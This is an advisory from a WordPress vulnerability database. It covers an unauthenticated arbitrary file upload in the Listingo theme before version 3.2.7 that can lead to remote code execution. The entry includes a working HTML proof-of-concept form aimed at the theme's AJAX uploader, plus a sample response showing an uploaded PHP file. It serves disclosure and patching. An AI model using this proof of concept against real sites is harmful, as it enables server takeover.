Themes Vulnerabilities
Listingo < 3.2.7 - Unauthenticated Arbitrary File Upload
Description
The theme does not validate files to be uploaded via an AJAX action available to unauthenticated users, which could allow them to upload arbitrary files and lead to RCE
Proof of Concept
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Listingo Unauthenticated File Upload</title> </head> <body> <form action="https://example.com/wp-admin/admin-ajax.php?action=listingo_temp_uploader" method="post" enctype="multipart/form-data"> Upload a File: <input type="file" name="listingo_uploader" id="listingo_uploader"> <input type="submit" name="submit" value="Start Upload"> </form> </body> </html> The response give the path to the file uploaded: {"type":"success","url":"https:\/\/example.com\/wp-content\/uploads\/wp-custom-uploader\/1665086303.php","filename":"1665086303.php","message":"Image deleted."}
Affects Themes
Fixed in 3.2.7
References
CVE
Miscellaneous
Original Researcher
Fioravante Souza
Submitter
Fioravante Souza
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-11-21 (about 1 years ago)
Added
2022-11-21 (about 1 years ago)
Last Updated
2022-12-12 (about 1 years ago)